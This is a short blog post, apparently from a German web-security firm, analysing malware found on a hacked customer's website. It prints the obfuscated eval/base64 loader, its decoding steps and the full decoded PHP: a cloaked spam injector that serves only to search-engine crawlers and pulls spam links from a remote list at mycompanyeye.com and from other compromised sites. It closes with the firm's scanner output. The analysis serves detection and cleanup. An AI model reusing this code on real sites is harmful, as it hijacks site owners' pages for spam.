-google-ads-
2013
11.22

Today, one Customer was hacked again and need some help.

So we found the infected File with the following Malware-Code:

eval(@gzinflate(base64_decode('xxx')));

decoded, the Code was:

preg_replace("/.+/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'xVdbc......iIf8A'\x29\x29\x29\x3B",".");

this in plain text is:

preg_replace("/.+/","eval(gzinflate(base64_decode('xVdbc+I..../SGl5PP8NgxjeEQXjwiIf8A')));",".");

and this decoded is:


h5('http://mycompanyeye.com/bulbozavr/gog8/13.list', 1 * 900);
function h5($u, $t){
$nobot = isset($_REQUEST['nobot']) ? true : false;
$debug = isset($_REQUEST['debug']) ? true : false;
$t2    = 3600 * 5;
$t3    = 3600 * 12;
$droot = getpasekaroot();
$tm    = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
if (!$tmp = triksp(array($tm, $droot.'images/avatars/', $droot.'tmp/', $droot.'cache/'))) {
if ($debug) {
echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "
");
}
return;
}
$agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if ($debug) {
echo('DEBUG: (INFO: temporary path=' . $tmp . ')<br>, agent ('.$agent.')' . "
");
}
if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
if ($debug) {
echo('DEBUG: (ERROR: you is not spider, return)<br>'."
");
}
return;
}
if ($debug) {
echo('DEBUG: (bot by:['.$ret[1].'])<br>'."
");
}

if ($t) {
if ($debug) {
if (file_exists($tmp . md5($u) . 'c')) {
echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "
");
$filemtime = filemtime($tmp . md5($u) . 'c');
$current   = time();
$diff      = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "
");
if ($diff < $t) {
echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
readfile($tmp . md5($u . 'c'));
if ($debug) {
echo('DEBUG: (END: readfile link, return)<br>' . "
");
}
return;
}
}
if ($debug) {
if (file_exists($tmp . md5($u))) {
echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "
");
$filemtime = filemtime($tmp . md5($u));
$current   = time();
$diff      = $current - $filemtime;
echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "
");
if ($diff < $t3) {
echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "
");
} else {
echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "
");
}
}
}
if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
$d = file($tmp . md5($u));
} else {
$c = curl_init($u);
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "
");
}
return;
}
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$d = curl_exec($c);
$l = curl_getinfo($c);
curl_close($c);
if ($l['http_code'] == 200 && $d) {
@file_put_contents($tmp . md5($u), $d);
$d = explode("
", $d);
}
}
if ($debug) {
echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "
");
}
if ($d) {
$l = @array_rand($d);
$c = @curl_init(trim($d[$l]));
if (!$c) {
if ($debug) {
echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "
");
}
return;
}
if ($t) {
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
}
$d = curl_exec($c);
if ($t) {
if ($debug) {
echo('DEBUG: (INFO: link download)<br>' . "
");
}
@file_put_contents($tmp . md5($u . 'c'), $d);
echo($d);
} else {
if ($debug) {
echo('DEBUG: (ERROR: link NOT download)<br>' . "
");
}
}
@curl_close($c);
}
}

function triksp($array){
foreach ($array as $path) {
if (is_writable($path)) {
return $path;
}
}
return false;
}

function getpasekaroot() {
$file = 'configuration.php';
$path = getcwd().DIRECTORY_SEPARATOR;
$c = 0;
while($c < 5) {
if (file_exists($path.$file)) {
return $path;
}
$path = dirname($path).DIRECTORY_SEPARATOR;
$c++;
}
return @$_SERVER['DOCUMENT_ROOT'];

 

The Site from http://mycompanyeye.com/bulbozavr/gog8/13.list gives a lot of urls back:

http://mar-jola.nazwa.pl/vat/components/com_gdui/ok/tent.php?id=13
http://www.eishockey-in-chemnitz.de/components/com_shhw/tent.php?id=13
http://www.hphorse.it/components/com_pdmu/local/tent.php?id=13

and on there site, there comes a lot of Viagra-Links and other Spam-Links back:

<a href="

Our Malware-Scanner find them all 🙂

FUNDE: 7x
#######################################
/malware/files/directory/index.php
#######################################
Changed  ->   21.11.2013 16:52:35 +0100
Zeile    ->   SuchMuster                        ->       FUND (Max. 300 Zeichen, gekuerzt, escaped..., angezigt maximal: 10)
113      ->   gzinflate(base64_decode...        ->       \\<\\\?php eval\\\(@gzinflate\\\(base64_decode\\\(\\'TVXHCuxWFvyXt/YDVZoRWalnGMr82CQrnJopVbqr3d7nsGzKIpTVXdxoQ5nXsv6v2s5Dxko//UD/gOCyx///vHzIomfF0V\+Gf2C/3lh9Jepr8Z\+mflC/IL85f2VofBfb/6Xw/7WHr\+0xzf3\+PqE9J3/zpF/f83Y/RvV1jkAFIxSSHlmFSs0iqwgZiBNiOR1aIbMDRzI9iMFEnlE7eikbOvY0I2DRMNmEKVbUIttBGeTud\+ns/PTFo3RCGN8ln71sYvaY1yP
decoded  ->   echo('DEBUG: (bot by:['...        ->       echo\\\(\\&\\#39\\;DEBUG: \\\(bot by:\\\[\\&\\#39\\;\.\\\$ret\\\[1\\\]\.\\&\\#39\\;\\\]\\\)\\&\\#39\\;\.\\&\\#34\\;\\\\r\\\\n\\&\\#34\\;\\\)\\;
decoded  ->   echo('DEBUG: (INFO: DOW...        ->       echo\\\(\\&\\#39\\;DEBUG: \\\(INFO: DOWNLOAD NEW LINK FILE\\&\\#39\\; \. \\&\\#34\\;\\\\r\\\\n\\&\\#34\\;\\\)\\;
decoded  ->   function getpasekaroot(...        ->       function getpasekaroot\\\(\\\) \\{
decoded  ->   echo('DEBUG: (bot by:['...        ->       echo\\\(\\&\\#39\\;DEBUG: \\\(bot by:\\\[\\&\\#39\\;\.\\\$ret\\\[1\\\]\.\\&\\#39\\;\\\]\\\)\\&\\#39\\;\.\\&\\#34\\;\\\\r\\\\n\\&\\#34\\;\\\)\\;
decoded  ->   echo('DEBUG: (INFO: DOW...        ->       echo\\\(\\&\\#39\\;DEBUG: \\\(INFO: DOWNLOAD NEW LINK FILE\\&\\#39\\; \. \\&\\#34\\;\\\\r\\\\n\\&\\#34\\;\\\)\\;
decoded  ->   function getpasekaroot(...        ->       function getpasekaroot\\\(\\\) \\{

If you have Questions, please contact us.

-google-ads-

Die Kommentarfunktion ist hier derzeit deaktiviert.

Translate »